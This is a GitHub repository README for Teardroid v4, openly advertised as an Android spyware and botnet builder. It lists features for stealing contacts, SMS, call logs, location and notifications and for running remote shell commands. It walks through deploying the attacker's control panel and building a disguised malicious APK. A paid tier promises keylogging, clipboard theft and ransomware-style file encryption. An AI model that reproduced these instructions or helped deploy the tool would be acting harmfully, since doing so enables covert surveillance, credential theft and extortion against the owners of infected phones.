Skip to content

🇮🇳 🤖 It's easy to use android botnet work without port forwarding, vps and android studio

License

Notifications You must be signed in to change notification settings

00secxq/Teardroid-phprat

 
 

Repository files navigation

🤖 Teardroid v4

Screenshot

🇮🇳 It's easy to use android botnet work without port forwarding, vps and android studio

GitHub issues Twitter Hacksec

🚀 Features

  • Retrieve Contact
  • Retrieve SMS
  • Retrieve running Services
  • Retrieve Device Location (:worried: Only work when the app is open on newer devices)
  • Retrieve Call Logs
  • Run Shell Command
  • Change Wallpaper
  • Send SMS
  • Make Call
  • Get Installed Apps
  • Download File
  • Read Notification
  • Auto-Start

⚠️ Requirement

  • Python3
  • Java
  • Linux or Windows os (we don't support termux use gcloud)

Java version i used

$ java -version
openjdk version "11.0.13" 2021-10-19
OpenJDK Runtime Environment (build 11.0.13+8)
OpenJDK 64-Bit Server VM (build 11.0.13+8, mixed mode)

Tested on

  • Windows 11
  • Windows 10
  • Manjaro
  • Kali linux
  • Ubuntu

Deploy the Teardroid control panel

  • Set up an account at deta.sh
  • Install Deta Cli
  • Logging in to Deta via the CLI
  • Create a new Python Micro using the command below
$ deta new --python teardroid_control # its will create an teardroid_control folder
$ git clone https://github.com/ScRiPt1337/Teardroidv4_api
  • Move all Teardroidv4_api Files to teardroid_control folder using the command below
$ cd Teardroidv4_api
$ cp -r * ../teardroid_control/
  • Deploy the Control panel using the following command.
$ deta deploy

How to setup

  • Clone Teardroid-phprat repo with the following command.
$ git clone https://github.com/ScRiPt1337/Teardroid-phprat
  • cd in the Teardroid-phprat directory, then type the command below to install all dependencies
$ pip install -r requirements.txt
  • Run the following command to see the options that we can use with the builder.
$ python Teardroid.py
[+] Checking Python Version
[+] Python Version : 3.10 ✓
  ______                    __           _     __         __ __
 /_  __/__  ____ __________/ /________  (_)___/ /  _   __/ // /
  / / / _ \/ __ `/ ___/ __  / ___/ __ \/ / __  /  | | / / // /_
 / / /  __/ /_/ / /  / /_/ / /  / /_/ / / /_/ /   | |/ /__  __/
/_/  \___/\__,_/_/   \__,_/_/   \____/_/\__,_/    |___/  /_/


Teardroid v4.0 - A tool to build teardroid spyware for Android devices. 🕷
Contact us : https://t.me/script1337 🚀
usage: Teardroid.py [-h] [-v] [-b]

options:
  -h, --help     show this help message and exit
  -v, --version  Version of Teardroid 🥴
  -b , --build   Build Teardroid with custom name [ex: Teardroid.py -b teardroid] 😷
  • To create an apk execute the following command.
$ python Teardroid.py -b your_app_name
  • It will prompt you with your Control Panel url enter your deta micro URL (without / at the end of the url).
  • You will also be prompted for the title and text of the notification. Enter what you want to display on the notification.
  • DONE

🌆 Build using bot

Dashboard

  • visit : https://{your server url}/v4/overview
  • defualt username/password is : admin/admin

Screenshot

  • Builder

  • Overview

  • TaskManager

Demo Video

🏧 Teardroid PRO

🌠 PRO Features

  • Get users key strokes (whatever they type in there keyboard like username password etc)
  • Get users clipboard data (get whatever is copied in there clipboard)
  • Add webview in the app
  • Encrypt files with AES encryption (work as ransomware)
  • Robust connection with server we will setup everything for you on aws or any other self hosting server
  • 24x7 support for 3 month (any kind of help or support related to teardroid will be given by our team)

Support me

"Buy Me A Coffee"

Beware from scam

  • Make sure the bot username is @teardroid_bot beware from scam
  • I am only available on telegram and script1337 is my only account please double check the username

Contact info

About

🇮🇳 🤖 It's easy to use android botnet work without port forwarding, vps and android studio

Resources

License

Code of conduct

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages

  • Smali 99.9%
  • Other 0.1%